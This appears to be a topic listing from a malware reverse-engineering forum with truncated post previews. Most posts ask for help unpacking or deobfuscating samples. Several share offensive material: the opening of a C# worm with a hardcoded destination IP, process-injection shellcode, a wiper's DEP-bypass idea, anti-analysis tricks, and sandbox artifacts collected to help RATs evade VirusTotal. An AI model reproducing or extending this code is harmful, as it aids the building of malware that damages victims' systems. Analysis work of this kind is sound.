Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
369 topics in this forum
-
- 1 reply
- 5k views
Hi. In order to advance myself in malware analysis I solve tasks from widely known malware-traffic-analysis.net. But I'm also trying to dig deeper and fully analyze malware samples found in pcaps. The one that puzzles me a lot is from 2019-06-22 task. Particularly the file 2019-06-22-malware-retrieved-from-the-infected-Windows-host.exe.zip (md5: 90c90e8d3fa5ca583e966d2a34565899). https://www.malware-traffic-analysis.net/2019/06/22/index.html What exactly, is that it basically doesn't show any red flags during basic static analysis. # Its import table is pretty "herbivore". # Strings don't show any obvious indicators. # The only thing that looks strang…
-
AV Evasion techniques or no...
by PeterN- 1 follower
- 1 reply
- 6k views
This is how poor advice from a course on malware creation looks like. Download Video
-
- 1 follower
- 2 replies
- 5.2k views
I've looked on this forum, other forums, I have googled, and used stack overflow but nothing useful seems to come out of it. I was wondering if any of you guys know a way to get the complete source code of a dll that is written is C++. Thank you.
-
Sandboxes Artifacts for AntiVM and anything
by JewishKinger- 0 replies
- 5.9k views
Hello everyone! Recently, I came up with the idea to hide the RAT and send it several times to VirusTotal. The purpose of these actions is to isolate virtual machine artifacts from the VirusTotal Sandbox. As a result, I collected lists of processes obtained from the virtual machines on which RAT was executed. It's funny that after numerous build submissions, I saw connections from Russian, Chinese, Czech, German servers (not counting the VirusTotal). I have successfully collected all the artifacts into one repository. I think, it will be very useful for the malware developers. It took me 2-3 hours to send numerous builds to their servers and collect …
-
C# Nemesis.Worm
by JMC31337- 1 reply
- 16.9k views
//JMC31337 //NEMESIS WORM PROJEKT using System; using System.Net; using System.Net.Sockets; using System.Text; using System.Threading; using System.Collections.Generic; using System.IO; using System.Text.RegularExpressions; using System.Net.Mail; using System.Net.Mime; using System.Runtime.InteropServices; using System.Diagnostics; using System.Collections; using System.ComponentModel; using System.Data; using Microsoft.Win32; namespace ConsoleApplication1 { class Program { public static int bypass = 0; private static string DESTINATION_IP_ADDRESS = "204.13.204.222"; private static string DESTINATION_IP_ADDRESS2 = "2…
-
- 1 follower
- 7 replies
- 7.5k views
Hi. Literally an hour ago, a massive phishing link was sent on the discord across all private messages and servers, which is why many channels blocked me and / or muddied me. I remembered that some time ago I came across the so-called Discord Perks that improve the user experience. And last time I was not embarrassed by the fact that I load extraneous scripts without proper analysis. I found the files that I downloaded, began to analyze in more detail and found too suspicious and obvious malware insertions. Could you help de-obfuscate the part that was obfuscated to understand where and how the data was sent? A large number of people were affected by this plugin, as t…
-
- 1 follower
- 0 replies
- 5.9k views
Hi everyone, I found a trojan horse while searching for a dll injector, so I tried to unpack it, but De4dot failed because it has multiple protections. I uploaded the target to Virustotal and found that Kaspersky and Eset and other antiviruses says: UNDETECTED but am pretty sure it's a trojan horse (VirusTotal scan result)I checked it using dnspy after I used de4dot more than once. The source code still unreadable, so I thought there might be another way to unpack this file. If someone managed to unpack it, please write a tutorial I want to learn what do when it comes to binaries packed this way. Target can be downloaded here : Download Link Greetz
-
[HelpMe] pyArmor Obfuscated Malware
by rhythm- 2 followers
- 3 replies
- 10.7k views
Somebody has any suggestion for decompiling pyArmor Obfuscated code (main.pyc)? I have not experience in python decompiling. Someone attacked our entities with this malware and I want to study the actual malicious code. You can download this malware at ... https://app.any.run/tasks/0fea95f7-25cf-4b7a-b26b-f26ac4f1995d/ Malware Source: https://www.adobe-flash-player.cc/down/flash_installer.exe main.pyc
-
HELP ME UNPACK MALWARE
by bemka- 2 replies
- 6.9k views
I see it in my computer. I can't decrypt it, it's logged into my google account sending virus files to my friends. Can someone help me decipher it? DeviceId.exe
-
How to deobfuscate this malware?
by pested- 1 follower
- 2 replies
- 6.3k views
uses a custom obfuscator.
-
fake crack sites
by Xyl2k- 2 followers
- 10 replies
- 17.6k views
So you want to download some releases from snd? alright let's see at snd.webscene.ir, the distribution section menu contain a link pointing at hxtps://keygens.pro/ Super, looks like there a lot of cracks over here! and the site is virus free, right? So let's pick something, i don't know, maybe 7-Data.Card.Recovery.1.1.keygen-SND hxtps://keygens.pro/crack/729775/ lol @ description on the page, didn't know reagan was from snd and born in russia Anyway we got redirected on a download page after clicking 'Download only Keygen' button, we have to fill a captcha and agree to the conditions The archive is password protected and contain only…
-
- 1 reply
- 8.8k views
I Am Reversing A Malware Called Raccoon Stealer Its Written In C++ My Problem Is They Use Some Libraries That IDA Marks As unknown_libname This is Because It Doesn't Have Signatures For Them I Downloaded Class Informer and It Pointed Me That They Uses A Library Called nlohmann Its A Json Parsing Library For C++ But I can't figure out how can I add signatures for these libraries though I saw this repo (FLIRTDB) contains some signatures but the library is not included is there is sort of generator for these signatures I can use ? or how can I approach this situation. Thanks In Advance .
-
- 0 replies
- 5.9k views
Hey Folks I Wanted To Share with u a poc I worked on today The Idea Behind It Is Instead of Hardcoding API Names or even their hashes in case u used api hashing we can receive this data from a server instead u can even encrypt the data sent this will complicate the analysis her is my poc have fun its very simple working on improving it and making another one but uses api hashing maybe u learn a thing or two from this https://gist.github.com/vxcute/30b1ea4ab792c1395e8c9cb8e92c384f
-
Unknown Packer
by payam5959- 1 follower
- 4 replies
- 25.4k views
I am trying to unpack 2 dll files which i'm not sure what they do. they seem to memory patch on some files. with Die it is detected as VMProtect, but when i browse them with CFFExplorer, and looking at different sections, I'm only seeing TORO0 and TORO1 with no vmp sections. I am not sure if it is VMP and so I have no clue how to unpack. can someone provide me some information on which kind of packer i am confronting with? also I can provide sample dll if someone can help. regards payam
-
- 2 followers
- 9 replies
- 7.6k views
A victim related to me got infected with a virus, and I decided to perform some reverse engineering on it. The victim received an e-mail that claimed to be an invoice from a portuguese company called "Galp". This seems to be a virus specifically made for this scam since the code has function and variables names that make sense if interpreted as portuguese language. I would like to mention that I'm trying to keep this guide as educational as possible so that newer people can also get something out of it and, therefore, there may be some statements and explanations that are not needed for experts. To all the experts out-there, I apologize. I would also like to rec…
-
PE Self Injection Not Working
by senuzulme99- 1 follower
- 7 replies
- 6.2k views
I'm working on different PE Injection technique. I want inject PE file into virtual memory of current executable. After that, I want execute injected PE file, I wrote inject code but my method is not working. Dos header and NT header parse correct, I write correctly sections and create new thread on the entrypoint of the .text section, but thread not working. What is the problem here? #include <iostream> #include <windows.h> int main() { DWORD* ImageBase; void* pImageBase; IMAGE_NT_HEADERS* NTHeader; IMAGE_DOS_HEADER* DOSHeader; IMAGE_NT_HEADERS* mem_NTHeader; IMAGE_DOS_HEADER* mem_DOSHeader; IMAGE_SECTION_HEADER* SecHeader; …
-
Polymorphic Parasitic Wiper (x86)
by JMC31337- 1 reply
- 6.1k views
This is a polymorphic (insofar as about 100 bytes of do nothing code is inserted into its decoding routine,) that has a hard coded XOR (easily rotated per infection if ya know what you're doing) Ill be writing up a white paper explaining the abusing of the DllCharacteristics value in the exe PE header - Teddy wrote a lil dissertation on this forum way back Basically once the entry point is changed and the infected host is set to DllChars = 0 the entry point is within a RW section of memory (last section) but DEP wont kick in allowing RWX all across the user space memory (tested on win version Win10 Pro v 1909 build 18363.592) Also since DLL Chars is set to…
-
How to deobfuscate this malware ?
by Ternick- 6 replies
- 8.2k views
I can not unzip this sample. Obfuscated BE CAREFULLY(DON'T RUN ON MAIN PC).exe code all the time. Most likely packed with this https://github.com/BedTheGod/ConfuserEx-Mod-By-Bed. But his application for unpacking from his own tread does not work for this sample.
-
Decompile JSC files
by Krabby- 1 follower
- 1 reply
- 9.5k views
During my research, i noticed that there's some difference between packed electron apps. Some of them are rally easy de-packable,and the source code it's really well understandable and not too much obfuscated. Sometimes i found the whole source compiled into a Javascript compiled file. The obfuscation of the code doesn't seems to hard, in fact if it was packed with bytenode there's still the possibility do debug it with the same module. But,to get deeper into it, what could be a good approach to analyze it fully? Cause it looks like it has no library dipendency cause all the node modules used are packed inside the jsc file. Also it's quite hard to debug it …
-
Cuckoo's Egg (proc injection)
by JMC31337- 1 follower
- 0 replies
- 5.6k views
call it cuckoo's egg because a Cuckoo bird is a parasite that lays its eggs in other birds' nests (got started on this idea in order to self delete my virus) searches through all processes and inject a remote thread spawning a messagebox in every mem location with RWX combined and modded up code from rwx-hunter.cpp and https://www.cnblogs.com/LyShark/p/13707084.html #include <windows.h> #include <iostream> #include <psapi.h> #include <TlHelp32.h> #include <stdio.h> #include <conio.h> unsigned char shell2[] = "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\xB9\xFF\xFF\xFF\xFF\xFF\xD1\xC3"; //pusha //push 0 //push 0 …
-
Mastering Malware Analysis - Free eBook
by Teddy Rogers- 1 follower
- 4 replies
- 13.3k views
Ted.
-
Cant unpack malware under VM
by Awaken- 1 follower
- 3 replies
- 6.8k views
Hello, Im trying to reverse malware,but can't remove the protection I think this is KoiVM(names in PE header),but oldrod can't devirtualize it What can I do?help please password:infected Btw,that malware cheks does it run on vm or not vklctukzxyuvdxvcsx.zip
-
Anubis 2.5 source code by vx-underground
by deepzero- 1 follower
- 0 replies
- 6.7k views
-
Help unpack Malware with VMProtect
by pl3xx- 1 follower
- 4 replies
- 7.1k views
Howdi, Anyone wiilling to give a hand ? Mega.nz
-
- 2 replies
- 5.7k views
Need help to unpack a malware , uploaded a crack.me.I need to study the code. I managed to obfusticate some but I have not the knowledge to complete this. hive_test-original.exe
